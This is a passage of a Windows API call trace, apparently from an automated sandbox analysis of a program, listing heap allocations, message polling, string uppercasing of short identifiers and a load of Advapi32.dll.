wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.116] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.117] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.117] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.117] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.117] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.118] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.118] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.118] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.120] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.121] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0188.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.122] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.122] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.122] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.123] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.123] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.124] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.124] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.125] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.126] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0188.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.127] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.129] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0188.130] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, 